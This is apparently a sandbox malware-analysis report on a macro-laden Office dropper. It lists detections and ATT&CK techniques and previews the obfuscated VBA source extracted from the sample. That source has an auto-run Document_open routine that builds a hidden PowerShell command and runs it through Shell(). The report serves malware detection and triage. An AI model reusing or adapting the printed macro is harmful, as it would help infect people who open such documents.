MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and utilizes a 'Shell()' call, indicating an attempt to execute arbitrary code. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6591643-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6591643-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17635 bytes |
SHA-256: b08cc975c55c985bb63d3fe57e6b7e8d8b868597362aec38aaa8eb5659b19c6a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JCWBzrKv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function NGIkV() On Error Resume Next jHipt = Atn(GSWEE + Sin(HiPbn) - 29213 / 22801) nputI = 82707 + 45191 ijvjdr = 58449 / 49206 oviJG = zojEjH * CSng(84700 * Fix(15192)) * qYGjW + CSng(YHrwT + CLng(UTwpWN)) / (zUiuQp * CSng(17066) - (89962 + Fix(lmuRj) - (73886 + CLng(VBHBS - Log(nnLmw) - 58616 + Int(kPNtt))))) WZAYX = wqMNn CmSmi = Atn(obqTri + Sin(IaktRj) - 79366 / 88769) wQiGl = 82788 + 92566 HSHNld = 59854 / 18671 IbziN = CLuMCi * CSng(64062 * Fix(92918)) * iEdjf + CSng(kbBYV + CLng(PMcsAi)) / (NubSK * CSng(94966) - (650 + Fix(wzLEdC) - (31167 + CLng(CHHQn - Log(AwKsp) - 74731 + Int(SUBANj))))) QSKBQ = UlFjYF YGiKSh = Atn(AprIcK + Sin(HRQcl) - 15938 / 61546) AHnqsj = 15968 + 67981 HLdGz = 51204 / 88356 tLXizi = wKwjP * CSng(51573 * Fix(29397)) * HKvYfa + CSng(VZQRA + CLng(ulvBUj)) / (wdlpq * CSng(39401) - (17280 + Fix(bZbas) - (95666 + CLng(hnjDGn - Log(zNhirC) - 48686 + Int(furqq))))) iCGGJj = soGwz Izvltl = Atn(LFisi + Sin(YVcBOi) - 97690 / 88518) qWOrV = 87280 + 26372 BtIwz = 85398 / 64304 OEizAz = hLhTG * CSng(14121 * Fix(17590)) * VEuaQ + CSng(oiLiz + CLng(pOPdh)) / (ETzYIJ * CSng(64247) - (59254 + Fix(dYdqR) - (63686 + CLng(smbSz - Log(ZaWOA) - 66675 + Int(SvElaD))))) rQOrI = rqZMsO NGIkV = iOoSvjhbs + Chr$(dwOwEIALXGf + 80 + wXQPQTTJPu) + "OwerSH" + uOibLE + IzOzajUoCm + dEjCpVqQaro + IzbpPMBjS vtcwz = Atn(zhwUQ + Sin(ssvZja) - 73461 / 5507) oWSwJ = 94245 + 36690 hoPKb = 68611 / 47048 XrEvl = CcuoUi * CSng(72474 * Fix(83661)) * UrQalL + CSng(WFfDNX + CLng(zovORT)) / (JwWwp * CSng(26555) - (58633 + Fix(Yjiwv) - (95208 + CLng(sWhqh - Log(wPiji) - 73600 + Int(AYPTXC))))) TOYsmL = ultWYR rSjCz = Atn(KUfKXS + Sin(ouNLf) - 94634 / 19381) NSCtB = 9043 + 99331 WizOS = 37774 / 67266 tlAzOF = mWbZh * CSng(54372 * Fix(11306)) * jGhwiv + CSng(PiuOaz + CLng(ihTAk)) / (nsnzt * CSng(65212) - (97658 + Fix(vzjqH) - (51049 + CLng(nUIUn - Log(VVEzi) - 28819 + Int(otFhrk))))) tCzXW = UkFXqA End Function Function MlPQSMiH(mpWzEO) On Error Resume Next zQGpi = Atn(OtjjbC + Sin(liwWR) - 23743 / 12476) qucMs = 82799 + 86873 jNQoh = 61548 / 81391 tBuamV = moidbS * CSng(72062 * Fix(16260)) * vAMac + CSng(HGJPj + CLng(UCacpV)) / (AEzkF * CSng(69969) - (97072 + Fix(tNZjE) - (72411 + CLng(RriSD - Log(unRWov) - 33522 + Int(DAlwlH))))) nmTdm = bXcZz OwtQit = Atn(PWSIO + Sin(wbHwJi) - 7096 / 41335) uhqNtB = 99423 + 39170 BFjtvV = 21359 / 27024 OiZBB = CpBzI * CSng(45664 * Fix(62648)) * tIZdSH + CSng(usNaWz + CLng(DvfjV)) / (YIuck * CSng(3485) - (47371 + Fix(bcqINk) - (93649 + CLng(UXhMb - Log(mLaiS) - 60165 + Int(FRcBWX))))) rMLqX = QdhCXo rQQCf = OIijiVC + Shell(prhwow + mpWzEO + EIBQLCT, 2194 - 2194) wcnwq = Atn(vfNvi + Sin(zcSVpA) - 34842 / 48392) WDEni = 18753 + 56508 ZZlint = 2755 / 29895 nUPfvn = pwwEIL * CSng(32926 * Fix(4013)) * IEdif + CSng(Bwtsj + CLng(oHrBkN)) / (svLcq * CSng(68637) - (77525 + Fix(GSjwEB) - (79072 + CLng(ZjvNmT - Log(lCEBA) - 80995 + Int(DYzMJ))))) zsrVi = twWVXl End Function Private Sub Document_open() On Error Resume Next iZjMKw = Atn(XhIXb + Sin(Mwbji) - 99923 / 45475) GaWAN = 74189 + 65444 oLCcCH = 98696 / 74323 zukpXC = QDXtQ * CSng(10426 * Fix(93529)) * mitUbs + CSng(wBsASL + CLng(mjOhZ)) / (zHfKv * CSng(84884) - (62598 + Fix(wiVTK) - (76789 + CLng(WTSGpT - Log(jwWjpE) - 32169 + Int(iifvof))))) PzEYks = dIzMZ ZimZO = Atn(ZtWVD + Sin(sssam) - 54876 / 2493) bRdAii = 14285 + 92679 XADtA = 89446 / 15309 oHPuO = kIrXku * CSng(87200 * Fix(46971)) * rcDEG + CSng(ALJwj + CLng(zBcRfq)) / (LwJpi * CSng(80314) - (86607 + Fix(Hoovi) - (86375 + CLng(ICiCp - Log(nwFwiv) - 71305 + Int(OGFDr))))) sijrrf = aPFncN Application.Run CRhLKt + "MlPQSMiH" + AQhStEDGodB, LNYzY + NGIkV + jmIPmTN XEWoBV = Atn(UkoUT + Sin(Cjibb) - 35144 / 24107) akscCs = 27387 + 76956 dIjdiq = 62875 / 61140 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.